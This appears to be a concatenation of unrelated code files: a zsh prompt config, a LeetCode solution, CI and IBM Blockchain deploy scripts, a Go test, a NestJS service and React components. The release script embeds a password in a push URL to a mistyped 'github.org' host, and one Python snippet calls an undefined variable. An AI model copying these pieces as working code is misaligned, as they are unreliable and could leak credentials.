# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_CONTENT_EXPANSION='$P9K_GOOGLE_APP_CRED_PROJECT_ID'
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES=(
# '*:*prod*:*' PROD # These values are examples that are unlikely
# '*:*test*:*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_FOREGROUND=7
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_BACKGROUND=4
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use POWERLEVEL9K_GOOGLE_APP_CRED_CONTENT_EXPANSION to specify the content displayed by
# google_app_cred segment. Parameter expansions are very flexible and fast, too. See reference:
# http://zsh.sourceforge.net/Doc/Release/Expansion.html#Parameter-Expansion.
#
# You can use the following parameters in the expansion. Each of them corresponds to one of the
# fields in the JSON file pointed to by GOOGLE_APPLICATION_CREDENTIALS.
#
# Parameter | JSON key file field
# ---------------------------------+---------------
# P9K_GOOGLE_APP_CRED_TYPE | type
# P9K_GOOGLE_APP_CRED_PROJECT_ID | project_id
# P9K_GOOGLE_APP_CRED_CLIENT_EMAIL | client_email
#
# Note: ${VARIABLE//\%/%%} expands to ${VARIABLE} with all occurrences of '%' replaced by '%%'.
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_DEFAULT_CONTENT_EXPANSION='${P9K_GOOGLE_APP_CRED_PROJECT_ID//\%/%%}'
###############################[ public_ip: public IP address ]###############################
# Public IP color.
# typeset -g POWERLEVEL9K_PUBLIC_IP_FOREGROUND=7
# typeset -g POWERLEVEL9K_PUBLIC_IP_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_PUBLIC_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
########################[ vpn_ip: virtual private network indicator ]#########################
# VPN IP color.
# typeset -g POWERLEVEL9K_VPN_IP_FOREGROUND=0
# typeset -g POWERLEVEL9K_VPN_IP_BACKGROUND=6
# When on VPN, show just an icon without the IP address.
# Tip: To display the private IP address when on VPN, remove the next line.
typeset -g POWERLEVEL9K_VPN_IP_CONTENT_EXPANSION=
# Regular expression for the VPN network interface. Run `ifconfig` or `ip -4 a show` while on VPN
# to see the name of the interface.
typeset -g POWERLEVEL9K_VPN_IP_INTERFACE='(gpd|wg|(.*tun))[0-9]*'
# If set to true, show one segment per matching network interface. If set to false, show only
# one segment corresponding to the first matching network interface.
# Tip: If you set it to true, you'll probably want to unset POWERLEVEL9K_VPN_IP_CONTENT_EXPANSION.
typeset -g POWERLEVEL9K_VPN_IP_SHOW_ALL=false
# Custom icon.
# typeset -g POWERLEVEL9K_VPN_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ ip: ip address and bandwidth usage for a specified network interface ]###########
# IP color.
typeset -g POWERLEVEL9K_IP_BACKGROUND=4
typeset -g POWERLEVEL9K_IP_FOREGROUND=0
# The following parameters are accessible within the expansion:
#
# Parameter | Meaning
# ----------------------+---------------
# P9K_IP_IP | IP address
# P9K_IP_INTERFACE | network interface
# P9K_IP_RX_BYTES | total number of bytes received
# P9K_IP_TX_BYTES | total number of bytes sent
# P9K_IP_RX_RATE | receive rate (since last prompt)
# P9K_IP_TX_RATE | send rate (since last prompt)
typeset -g POWERLEVEL9K_IP_CONTENT_EXPANSION='${P9K_IP_RX_RATE:+⇣$P9K_IP_RX_RATE }${P9K_IP_TX_RATE:+⇡$P9K_IP_TX_RATE }$P9K_IP_IP'
# Show information for the first network interface whose name matches this regular expression.
# Run `ifconfig` or `ip -4 a show` to see the names of all network interfaces.
typeset -g POWERLEVEL9K_IP_INTERFACE='e.*'
# Custom icon.
# typeset -g POWERLEVEL9K_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
#########################[ proxy: system-wide http/https/ftp proxy ]##########################
# Proxy color.
# typeset -g POWERLEVEL9K_PROXY_FOREGROUND=4
# typeset -g POWERLEVEL9K_PROXY_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_PROXY_VISUAL_IDENTIFIER_EXPANSION='⭐'
################################[ battery: internal battery ]#################################
# Show battery in red when it's below this level and not connected to power supply.
typeset -g POWERLEVEL9K_BATTERY_LOW_THRESHOLD=20
typeset -g POWERLEVEL9K_BATTERY_LOW_FOREGROUND=1
# Show battery in green when it's charging or fully charged.
typeset -g POWERLEVEL9K_BATTERY_{CHARGING,CHARGED}_FOREGROUND=2
# Show battery in yellow when it's discharging.
typeset -g POWERLEVEL9K_BATTERY_DISCONNECTED_FOREGROUND=3
# Battery pictograms going from low to high level of charge.
typeset -g POWERLEVEL9K_BATTERY_STAGES='\uf58d\uf579\uf57a\uf57b\uf57c\uf57d\uf57e\uf57f\uf580\uf581\uf578'
# Don't show the remaining time to charge/discharge.
typeset -g POWERLEVEL9K_BATTERY_VERBOSE=false
# typeset -g POWERLEVEL9K_BATTERY_BACKGROUND=0
#####################################[ wifi: wifi speed ]#####################################
# WiFi color.
# typeset -g POWERLEVEL9K_WIFI_FOREGROUND=0
# typeset -g POWERLEVEL9K_WIFI_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_WIFI_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use different colors and icons depending on signal strength ($P9K_WIFI_BARS).
#
# # Wifi colors and icons for different signal strength levels (low to high).
# typeset -g my_wifi_fg=(0 0 0 0 0) # <-- change these values
# typeset -g my_wifi_icon=('WiFi' 'WiFi' 'WiFi' 'WiFi' 'WiFi') # <-- change these values
#
# typeset -g POWERLEVEL9K_WIFI_CONTENT_EXPANSION='%F{${my_wifi_fg[P9K_WIFI_BARS+1]}}$P9K_WIFI_LAST_TX_RATE Mbps'
# typeset -g POWERLEVEL9K_WIFI_VISUAL_IDENTIFIER_EXPANSION='%F{${my_wifi_fg[P9K_WIFI_BARS+1]}}${my_wifi_icon[P9K_WIFI_BARS+1]}'
#
# The following parameters are accessible within the expansions:
#
# Parameter | Meaning
# ----------------------+---------------
# P9K_WIFI_SSID | service set identifier, a.k.a. network name
# P9K_WIFI_LINK_AUTH | authentication protocol such as "wpa2-psk" or "none"; empty if unknown
# P9K_WIFI_LAST_TX_RATE | wireless transmit rate in megabits per second
# P9K_WIFI_RSSI | signal strength in dBm, from -120 to 0
# P9K_WIFI_NOISE | noise in dBm, from -120 to 0
# P9K_WIFI_BARS | signal strength in bars, from 0 to 4 (derived from P9K_WIFI_RSSI and P9K_WIFI_NOISE)
####################################[ time: current time ]####################################
# Current time color.
# typeset -g POWERLEVEL9K_TIME_FOREGROUND=0
# typeset -g POWERLEVEL9K_TIME_BACKGROUND=7
# Format for the current time: 09:51:02. See `man 3 strftime`.
typeset -g POWERLEVEL9K_TIME_FORMAT='%D{%H:%M:%S}'
# If set to true, time will update when you hit enter. This way prompts for the past
# commands will contain the start times of their commands as opposed to the default
# behavior where they contain the end times of their preceding commands.
typeset -g POWERLEVEL9K_TIME_UPDATE_ON_COMMAND=false
# Custom icon.
typeset -g POWERLEVEL9K_TIME_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_TIME_PREFIX='at '
# Example of a user-defined prompt segment. Function prompt_example will be called on every
# prompt if `example` prompt segment is added to POWERLEVEL9K_LEFT_PROMPT_ELEMENTS or
# POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS. It displays an icon and yellow text on red background
# greeting the user.
#
# Type `p10k help segment` for documentation and a more sophisticated example.
function prompt_example() {
p10k segment -b 1 -f 3 -i '⭐' -t 'hello, %n'
}
# User-defined prompt segments may optionally provide an instant_prompt_* function. Its job
# is to generate the prompt segment for display in instant prompt. See
# https://github.com/romkatv/powerlevel10k/blob/master/README.md#instant-prompt.
#
# Powerlevel10k will call instant_prompt_* at the same time as the regular prompt_* function
# and will record all `p10k segment` calls it makes. When displaying instant prompt, Powerlevel10k
# will replay these calls without actually calling instant_prompt_*. It is imperative that
# instant_prompt_* always makes the same `p10k segment` calls regardless of environment. If this
# rule is not observed, the content of instant prompt will be incorrect.
#
# Usually, you should either not define instant_prompt_* or simply call prompt_* from it. If
# instant_prompt_* is not defined for a segment, the segment won't be shown in instant prompt.
function instant_prompt_example() {
# Since prompt_example always makes the same `p10k segment` calls, we can call it from
# instant_prompt_example. This will give us the same `example` prompt segment in the instant
# and regular prompts.
prompt_example
}
# User-defined prompt segments can be customized the same way as built-in segments.
# typeset -g POWERLEVEL9K_EXAMPLE_FOREGROUND=3
# typeset -g POWERLEVEL9K_EXAMPLE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Transient prompt works similarly to the builtin transient_rprompt option. It trims down prompt
# when accepting a command line. Supported values:
#
# - off: Don't change prompt when accepting a command line.
# - always: Trim down prompt when accepting a command line.
# - same-dir: Trim down prompt when accepting a command line unless this is the first command
# typed after changing current working directory.
typeset -g POWERLEVEL9K_TRANSIENT_PROMPT=always
# Instant prompt mode.
#
# - off: Disable instant prompt. Choose this if you've tried instant prompt and found
# it incompatible with your zsh configuration files.
# - quiet: Enable instant prompt and don't print warnings when detecting console output
# during zsh initialization. Choose this if you've read and understood
# https://github.com/romkatv/powerlevel10k/blob/master/README.md#instant-prompt.
# - verbose: Enable instant prompt and print a warning when detecting console output during
# zsh initialization. Choose this if you've never tried instant prompt, haven't
# seen the warning, or if you are unsure what this all means.
typeset -g POWERLEVEL9K_INSTANT_PROMPT=quiet
# Hot reload allows you to change POWERLEVEL9K options after Powerlevel10k has been initialized.
# For example, you can type POWERLEVEL9K_BACKGROUND=red and see your prompt turn red. Hot reload
# can slow down prompt by 1-2 milliseconds, so it's better to keep it turned off unless you
# really need it.
typeset -g POWERLEVEL9K_DISABLE_HOT_RELOAD=true
# If p10k is already loaded, reload configuration.
# This works even with POWERLEVEL9K_DISABLE_HOT_RELOAD=true.
(( ! $+functions[p10k] )) || p10k reload
}
# Tell `p10k configure` which file it should overwrite.
typeset -g POWERLEVEL9K_CONFIG_FILE=${${(%):-%x}:a}
(( ${#p10k_config_opts} )) && setopt ${p10k_config_opts[@]}
'builtin' 'unset' 'p10k_config_opts'
|
<reponame>appigram/windmill-react-ui
import React from 'react';
interface Props extends React.TdHTMLAttributes<HTMLTableCellElement> {
}
declare const TableCell: React.ForwardRefExoticComponent<Props & React.RefAttributes<HTMLTableCellElement>>;
export default TableCell;
//# sourceMappingURL=TableCell.d.ts.map |
// Source : https://leetcode.com/problems/sum-root-to-leaf-numbers/
// Author : <NAME>
/**
* Definition for a binary tree node.
* function TreeNode(val) {
* this.val = val;
* this.left = this.right = null;
* }
*/
/**
* @param {TreeNode} root
* @return {number}
*/
var ans;
function dfs(root, sum) {
if (!root.left && !root.right) {
ans += sum * 10 + root.val;
return;
}
if (root.left)
dfs(root.left, sum * 10 + root.val);
if (root.right)
dfs(root.right, sum * 10 + root.val);
}
var sumNumbers = function(root) {
if (root === null)
return 0;
ans = 0;
dfs(root, 0);
return ans;
};
|
#!/bin/bash
if [ -n "$EMAIL" ]; then
git config user.email "$EMAIL"
fi
if [ -n "$PASSWORD" ]; then
git config user.name "Travis Ci"
fi
export TAG=$(git log -1 | grep -Eo 'tag: ([0-9\.]+)' | cut -d' ' -f2)
if [ -n "$TAG" ]; then
git remote set-url origin "https://brunodles:${PASSWORD}@github.org/brunodles/java-validation.git"
echo -n "$TAG">.version
git commit -am "Prepare release $TAG"
git tag $TAG
git push origin $TAG
git push origin master
fi
|
import os
import errno
def is_process_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
return True |
<reponame>ismetguzelgun/cooking-js<gh_stars>0
//v1
a = 2;
var a;
console.log( a );
//v1 changes into
var a;
a = 2;
console.log( a );
//v2
console.log( a );
var a = 2;
//v2 changes into
var a;
console.log( a );
a = 2;
//v1 vs. v2
/**
* JS sadece deklarasyonları yukarı taşıyor
* yani birinci örnekte var a, a=2 nin üzerine taşınıyor
* fakat console.log yerinde kalıyor bu sayede kod çalışıyor
*
* v2 örneğinde ise var a yukarı taşınırken
* hemen altında yer alan console.log yukarı taşınmadığı için undefined yazdırıyor.
* sonrasında ancak 2 değerini a ya atayabiliyor.
* https://www.freecodecamp.org/news/what-is-variable-hoisting-differentiating-between-var-let-and-const-in-es6-f1a70bb43d/
*/
|
package acceptance
import (
"github.com/onsi/gomega/ghttp"
"net/http"
"os/exec"
"github.com/onsi/gomega/gbytes"
"github.com/onsi/gomega/gexec"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("delete-installation command", func() {
var (
server *ghttp.Server
)
BeforeEach(func() {
server = createTLSServer()
server.AppendHandlers(
ghttp.VerifyRequest("GET", "/api/v0/installations"),
ghttp.CombineHandlers(
ghttp.VerifyRequest("DELETE", "/api/v0/installation_asset_collection"),
ghttp.RespondWith(http.StatusOK, `{"install": {"id": 42}}`),
),
ghttp.CombineHandlers(
ghttp.VerifyRequest("GET", "/api/v0/installations/42"),
ghttp.RespondWith(http.StatusOK, `{ "status": "running" }`),
),
ghttp.CombineHandlers(
ghttp.VerifyRequest("GET", "/api/v0/installations/42/logs"),
ghttp.RespondWith(http.StatusOK, `{ "logs": "call #0\n"}`),
),
ghttp.CombineHandlers(
ghttp.VerifyRequest("GET", "/api/v0/installations/42"),
ghttp.RespondWith(http.StatusOK, `{ "status": "succeeded" }`),
),
ghttp.CombineHandlers(
ghttp.VerifyRequest("GET", "/api/v0/installations/42/logs"),
ghttp.RespondWith(http.StatusOK, `{ "logs": "call #0\ncall #1"}`),
),
)
})
AfterEach(func() {
server.Close()
})
It("successfully deletes the installation on the Ops Manager", func() {
command := exec.Command(pathToMain,
"--target", server.URL(),
"--username", "some-username",
"--password", "<PASSWORD>",
"--skip-ssl-validation",
"delete-installation",
"--force")
session, err := gexec.Start(command, GinkgoWriter, GinkgoWriter)
Expect(err).ToNot(HaveOccurred())
Eventually(session, "5s").Should(gexec.Exit(0))
Expect(session.Out).To(gbytes.Say("attempting to delete the installation on the targeted Ops Manager"))
Expect(session.Out).To(gbytes.Say("call #0"))
Expect(session.Out).To(gbytes.Say("call #1"))
})
})
|
import io
# Google Cloud Platform
from google.cloud import speech_v1
from google.cloud.speech_v1 import enums
# Audio configuration
sample_rate_hertz = 44100
channels = 1
language_code='en-US'
client = speech_v1.SpeechClient()
# Set audio encoding
encoding = enums.RecognitionConfig.AudioEncoding.LINEAR16
config = {
"sample_rate_hertz": sample_rate_hertz,
"language_code": language_code,
"encoding": encoding,
"audio_channel_count": channels
}
# Read audio file
filename = 'audio.wav'
with open(filename, 'rb') as read_file:
audio = read_file.read()
# Execute voice recognition
response = client.recognize(config, audio)
# Get results
for result in response.results:
print('Transcript: {}'.format(result.alternatives[0].transcript)) |
#!/usr/bin/env bash
# Common IBM blockchain platform functions, e.g. to provision a blockchain service
# shellcheck disable=2086
# shellcheck source=src/common/utils.sh
source "${SCRIPT_DIR}/common/utils.sh"
#######################################
# Setup constants for bluemix cloud foundry interaction
# Globals:
# get: REGION_ID
# set: BLOCKCHAIN_SERVICE_NAME
# set: BLOCKCHAIN_SERVICE_PLAN
# set: BLOCKCHAIN_SERVICE_KEY
# Arguments:
# None
# Returns:
# None
#######################################
function setup_service_constants {
local region_instance
region_instance=$(echo "$REGION_ID" | cut -d : -f 2)
if [ "${region_instance}" = "ys1" ]; then
BLOCKCHAIN_SERVICE_NAME="ibm-blockchain-5-staging"
BLOCKCHAIN_SERVICE_PLAN="ibm-blockchain-plan-v1-ga1-starter-staging"
else
BLOCKCHAIN_SERVICE_NAME="ibm-blockchain-5-prod"
BLOCKCHAIN_SERVICE_PLAN="ibm-blockchain-plan-v1-ga1-starter-prod"
fi
export BLOCKCHAIN_SERVICE_KEY="Credentials-1"
export BLOCKCHAIN_SERVICE_NAME
export BLOCKCHAIN_SERVICE_PLAN
}
#######################################
# Update network credentials to reflect targeted 'org' argument using 'blockchain.json'
# Globals:
# set: BLOCKCHAIN_SECRET
# set: BLOCKCHAIN_KEY
# set: BLOCKCHAIN_API
# Arguments:
# org: must match a top-level key in 'blockchain.json'
# Returns:
# None
#######################################
function authenticate_org {
local org=$1
local file="blockchain.json"
local BLOCKCHAIN_NETWORK_ID
local BLOCKCHAIN_URL
BLOCKCHAIN_NETWORK_ID=$(jq --raw-output ".${org}.network_id" ${file})
BLOCKCHAIN_URL=$(jq --raw-output ".${org}.url" ${file})
BLOCKCHAIN_KEY=$(jq --raw-output ".${org}.key" ${file})
BLOCKCHAIN_SECRET=$(jq --raw-output ".${org}.secret" ${file})
BLOCKCHAIN_API="${BLOCKCHAIN_URL}/api/v1/networks/${BLOCKCHAIN_NETWORK_ID}"
}
#######################################
# Populate 'blockchain.json' with network credentials by interacting with the
# bluemix cloud foundry CLI to create/modify service instance and key
# Globals:
# get: BLOCKCHAIN_SERVICE_INSTANCE
# get: BLOCKCHAIN_SERVICE_NAME
# get: BLOCKCHAIN_SERVICE_PLAN
# get: BLOCKCHAIN_SERVICE_KEY
# Arguments:
# None
# Returns:
# None
#######################################
function provision_blockchain {
cf create-service "${BLOCKCHAIN_SERVICE_NAME}" "${BLOCKCHAIN_SERVICE_PLAN}" "${BLOCKCHAIN_SERVICE_INSTANCE}" || error_exit "Error creating blockchain service"
cf create-service-key "${BLOCKCHAIN_SERVICE_INSTANCE}" "${BLOCKCHAIN_SERVICE_KEY}" || error_exit "Error creating blockchain service key"
local blockchain_service_key
blockchain_service_key=$(cf service-key "${BLOCKCHAIN_SERVICE_INSTANCE}" "${BLOCKCHAIN_SERVICE_KEY}") || error_exit "Error retrieving blockchain service key"
echo "$blockchain_service_key" | tail -n +2 > blockchain.json
}
#######################################
# Helper for get_blockchain_connection_profile
# Globals:
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# get: BLOCKCHAIN_API
# Arguments:
# None
# Returns:
# None
#######################################
function get_blockchain_connection_profile_inner {
do_curl \
-H 'Content-Type: application/json' \
-H 'Accept: application/json' \
-u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
"${BLOCKCHAIN_API}/connection_profile" > blockchain-connection-profile.json
}
#######################################
# Requests and waits for network information from the IBM Blockchain platform
# api, outputting into 'blockchain-connection-profile.json'
# Globals:
# None
# Arguments:
# None
# Returns:
# None
#######################################
function get_blockchain_connection_profile {
get_blockchain_connection_profile_inner
while ! jq -e ".channels.defaultchannel" blockchain-connection-profile.json
do
sleep 10
get_blockchain_connection_profile_inner
done
}
#######################################
# Installs chaincode file with specified id and version
# Globals:
# get: BLOCKCHAIN_API
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# Arguments:
# CC_ID: Name to label installation with
# CC_VERSION: Version to label installation with
# CC_PATH: Path to chaincode directory to be installed
# CC_TYPE: Type of chaincode to install (golang|node)
# Returns:
# err_no:
# 2 = chaincode exists with specified id and version
# 1 = unrecognized error returned by IBM Blockchain platform api
# 0 = chaincode successfully installed with specified id and version
#######################################
function install_fabric_chaincode {
local CC_ID=$1
local CC_VERSION=$2
local CC_PATH=$3
local CC_TYPE=$4
local CHAINCODE_FILES
echo "Installing chaincode '$CC_PATH' with id '$CC_ID' and version '$CC_VERSION'..."
CHAINCODE_FILES=$(find ${CC_PATH} -type f ! -name "*test*")
CHAINCODE_FILE_OPTS=""
for CHAINCODE_FILE in ${CHAINCODE_FILES}
do
CHAINCODE_FILE_OPTS="${CHAINCODE_FILE_OPTS} -F files[]=@${CHAINCODE_FILE}"
done
OUTPUT=$(do_curl \
-X POST \
-u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
$CHAINCODE_FILE_OPTS \
-F chaincode_id="${CC_ID}" -F chaincode_version="${CC_VERSION}" \
-F chaincode_type="${CC_TYPE}" \
"${BLOCKCHAIN_API}/chaincode/install")
if [ $? -eq 1 ]
then
echo "Failed to install fabric contract:"
if [[ "${OUTPUT}" == *"chaincode code"*"exists"* ]]
then
echo "Chaincode already installed with id '${CC_ID}' and version '${CC_VERSION}'"
return 2
else
echo "Unrecognized error returned:"
echo "$OUTPUT"
return 1
fi
fi
echo "Successfully installed fabric contract."
return 0
}
#######################################
# Instantiates chaincode object with specified id and version in target channel,
# using optional initial arguments
# Globals:
# get: BLOCKCHAIN_API
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# Arguments:
# CC_ID: Name to label instance with
# CC_VERSION: Version to label instance with
# CC_TYPE: Type of chaincode to instantiate (golang|node)
# CHANNEL: Channel for instance to be constructed in
# INIT_ARGS: (optional) Constructor arguments
# Returns:
# err_no:
# 2 = chaincode instance exists with specified id and version
# 1 = unrecognized error returned by IBM Blockchain platform api
# 0 = chaincode successfully instantiated with specified id and version
#######################################
function instantiate_fabric_chaincode {
local CC_ID=$1
local CC_VERSION=$2
local CC_TYPE=$3
local CHANNEL=$4
local INIT_ARGS=$5
cat << EOF > request.json
{
"chaincode_id": "${CC_ID}",
"chaincode_version": "${CC_VERSION}",
"chaincode_type": "${CC_TYPE}",
"chaincode_arguments": [${INIT_ARGS}]
}
EOF
echo "Instantiating fabric contract with id '$CC_ID' version '$CC_VERSION' and chaincode type '$CC_TYPE' on channel '$CHANNEL' with arguments '$INIT_ARGS'..."
OUTPUT=$(do_curl \
-X POST \
-H 'Content-Type: application/json' \
-u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
--data-binary @request.json \
"${BLOCKCHAIN_API}/channels/${CHANNEL}/chaincode/instantiate")
local do_curl_status=$?
rm -f request.json
if [[ "${OUTPUT}" == *"Failed to establish a backside connection"* || "${OUTPUT}" == *"premature execution"* ]]
then
echo "Connection problem encountered, delaying 30s and trying again..."
sleep 30
instantiate_fabric_chaincode "$@"
return $?
fi
if [ $do_curl_status -eq 1 ]
then
echo "Failed to instantiate fabric contract:"
if [[ "${OUTPUT}" == *"version already exists for chaincode"* ]]
then
echo "Chaincode instance already exists with id '${CC_ID}' version '${CC_VERSION}' and chaincode type '$CC_TYPE'"
return 2
else
echo "Unrecognized error returned:"
echo "${OUTPUT}"
return 1
fi
fi
echo "Successfully instantiated fabric contract."
return 0
}
#######################################
# Parses deployment configuration and makes corresponding install and
# instatiate requests
# Globals:
# None
# Arguments:
# CC_TYPE: Type of chaincode to deploy (golang|node)
# DEPLOY_CONFIG: path to json config file
# Returns:
# None
#######################################
function deploy_fabric_chaincode {
local CC_TYPE=$1
local DEPLOY_CONFIG=$2
echo "Parsing deployment configuration:"
cat "$DEPLOY_CONFIG"
for org in $(jq -r "to_entries[] | .key" "$DEPLOY_CONFIG")
do
echo "Targeting org '$org'..."
authenticate_org "$org"
local cc_index=0
jq -r ".${org}.chaincode[].path" "$DEPLOY_CONFIG" | while read -r CC_PATH
do
CC_NAME=$(jq -r ".${org}.chaincode[$cc_index].name" "$DEPLOY_CONFIG")
CC_INSTALL=$(jq -r ".${org}.chaincode[$cc_index].install" "$DEPLOY_CONFIG")
CC_INSTANTIATE=$(jq -r ".${org}.chaincode[$cc_index].instantiate" "$DEPLOY_CONFIG")
CC_CHANNELS=$(jq -r ".${org}.chaincode[$cc_index].channels[]" "$DEPLOY_CONFIG")
CC_INIT_ARGS=$(jq ".${org}.chaincode[$cc_index].init_args[]" "$DEPLOY_CONFIG")
# TODO: Integrate with configuration
CC_ID="${CC_NAME}"
CC_VERSION="$(date '+%Y%m%d%H%M%S')-${BUILD_NUMBER}"
if $CC_INSTALL
then
install_fabric_chaincode $CC_ID $CC_VERSION $CC_PATH $CC_TYPE
# If install failed due to a reason other than an identical version already exists, skip instantiate
if [ $? -eq 1 ]; then
continue
fi
fi
if $CC_INSTANTIATE
then
for channel in $CC_CHANNELS
do
instantiate_fabric_chaincode $CC_ID $CC_VERSION $CC_TYPE $channel $CC_INIT_ARGS
done
fi
cc_index=$((cc_index + 1))
done
done
echo "Done parsing deployment configuration."
}
|
/* eslint-disable @typescript-eslint/no-var-requires */
import { HttpCode, HttpException, HttpStatus, Injectable } from '@nestjs/common';
const bcrypt = require('bcrypt');
import { PrismaService } from '../Prisma/prisma.service';
import { users, usersCreateInput, usersWhereUniqueInput } from '@prisma/client';
import { AccountOverViewResponseDTO } from './profile.dto';
import { authService } from 'src/auth/auth.service';
@Injectable()
export class ProfileService {
constructor(private prisma: PrismaService,private auth: authService) {}
async getAccountOverView(userID): Promise<AccountOverViewResponseDTO> {
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
return this.serialiseUserData(user);
}
async updateAccountDetails(userID,updatedDetails: any): Promise<users> {
let user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
if(!user) throw new HttpException({
code : 404,
error : "USER NOT FOUND"
},HttpStatus.NOT_FOUND)
user = await this.prisma.users.update({
where : {
id: userID as string,
},
data : {
email : updatedDetails.email,
dob : updatedDetails.dob,
gender : updatedDetails.gender
}
})
return user;
}
async changePassword(userID,oldPassword: string, newPassword: string): Promise<any> {
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
const verified = await this.auth.verifyUser(user,oldPassword);
if(verified){
const newHashedPassword = await this.auth.getHashPassword(newPassword);
await this.prisma.users.update({
where : {
id : user.id,
},
data : {
password : <PASSWORD>
}
})
return {
success : true,
message : 'password changed !'
}
}
throw new HttpException({
code : HttpStatus.NOT_ACCEPTABLE,
error : "password incorrect !"
},HttpStatus.NOT_ACCEPTABLE)
}
async canChangePassword(userID: string) : Promise<boolean>{
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
if(!user) throw new HttpException({
code : 404,
error : "USER NOT FOUND"
},HttpStatus.NOT_FOUND)
return user.authtype === 'local'
}
serialiseUserData (user: users): AccountOverViewResponseDTO{
return {
userName : user.name,
email : user.email,
dob : user.dob.toLocaleString().split(',')[0],
gender : user.gender,
editable : user.authtype === 'local'
}
}
}
|
def most_frequent_letter(word, letters):
# Create a dictionary of letter frequency
frequency = {letter : word.count(letter) for letter in letters}
# Get the highest frequency letter
max_frequency = max(frequency.values())
# Get the index of the letter with the highest frequency
index = word.find(list(frequency.keys())[list(frequency.values()).index(max_frequency)])
return index
print(most_frequent_letter('hello', letters)) # 2 |
import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import Dropzone from 'react-dropzone';
import ReactTooltip from 'react-tooltip';
// material ui
import { Button, Tooltip, Typography } from '@material-ui/core';
import { Help as HelpIcon, Sort as SortIcon } from '@material-ui/icons';
import { setSnackbar } from '../../actions/appActions';
import { editArtifact, uploadArtifact, selectArtifact, selectRelease } from '../../actions/releaseActions';
import { preformatWithRequestID, customSort } from '../../helpers';
import { ExpandArtifact } from '../helptips/helptooltips';
import Loader from '../common/loader';
import ReleaseRepositoryItem from './releaserepositoryitem';
import { getOnboardingComponentFor, advanceOnboarding, getOnboardingStepCompleted } from '../../utils/onboardingmanager';
const columnHeaders = [
{ title: 'Device type compatibility', name: 'device_types', sortable: false },
{ title: 'Last modified', name: 'modified', sortable: true },
{ title: 'Type', name: 'type', sortable: false },
{ title: 'Size', name: 'size', sortable: true }
];
export class ReleaseRepository extends React.Component {
constructor(props, context) {
super(props, context);
this.state = {
popupLabel: 'Upload a new artifact',
sortCol: 'modified',
sortDown: true,
tmpFile: null,
upload: false,
wasSelectedRecently: false
};
}
componentDidUpdate(prevProps) {
if (prevProps.release && this.props.release && prevProps.release.Name !== this.props.release.Name) {
const self = this;
self.setState({ wasSelectedRecently: true }, () => setTimeout(() => self.setState({ wasSelectedRecently: false }), 200));
}
}
onDrop(acceptedFiles, rejectedFiles) {
if (acceptedFiles.length) {
this.props.onUpload(acceptedFiles[0]);
}
if (rejectedFiles.length) {
this.props.setSnackbar(`File '${rejectedFiles[0].name}' was rejected. File should be of type .mender`, null);
}
}
_onRowSelection(artifact) {
if (!artifact || !this.props.selectedArtifact || this.props.selectedArtifact.id !== artifact.id) {
this.props.selectArtifact(artifact);
} else {
this.props.selectArtifact();
}
if (!this.props.onboardingComplete) {
advanceOnboarding('artifact-included-onboarding');
}
}
_editArtifactData(id, description) {
var self = this;
return self.props
.editArtifact(id, { description })
.then(() => {
self.props.setSnackbar('Artifact details were updated successfully.', 5000, '');
self.props.refreshArtifacts();
})
.catch(err => {
const errMsg = err.res.body.error || '';
self.props.setSnackbar(preformatWithRequestID(err.res, `Artifact details couldn't be updated. ${errMsg || err.error}`), null, 'Copy to clipboard');
});
}
onCreateDeploymentFrom(release) {
if (!this.props.onboardingComplete && getOnboardingStepCompleted('upload-new-artifact-tip')) {
advanceOnboarding('artifact-modified-onboarding');
}
this.props.selectRelease(release);
}
_sortColumn(col) {
if (!col.sortable) {
return;
}
// sort table
this.setState({ sortDown: !this.state.sortDown, sortCol: col.name });
}
render() {
const self = this;
const { loading, onUpload, release, releases, selectedArtifact, showHelptips, uploading } = self.props;
const { sortCol, sortDown, wasSelectedRecently } = self.state;
const artifacts = release ? release.Artifacts : [];
const items = artifacts.sort(customSort(sortDown, sortCol)).map((pkg, index) => {
const expanded = !!(selectedArtifact && selectedArtifact.id === pkg.id);
return (
<ReleaseRepositoryItem
key={`repository-item-${index}`}
artifact={pkg}
expanded={expanded}
index={index}
onEdit={(id, description) => self._editArtifactData(id, description)}
onRowSelection={() => self._onRowSelection(pkg)}
// this will be run after expansion + collapse and both need some time to fully settle
// otherwise the measurements are off
onExpanded={() => setTimeout(() => self.setState({}), 500)}
release={release}
ref={ref => (this.repoItemAnchor = ref)}
/>
);
});
const dropzoneClass = uploading ? 'dropzone disabled muted' : 'dropzone';
// We need the ref to the <a> element that refers to the deployments tab, in order to align
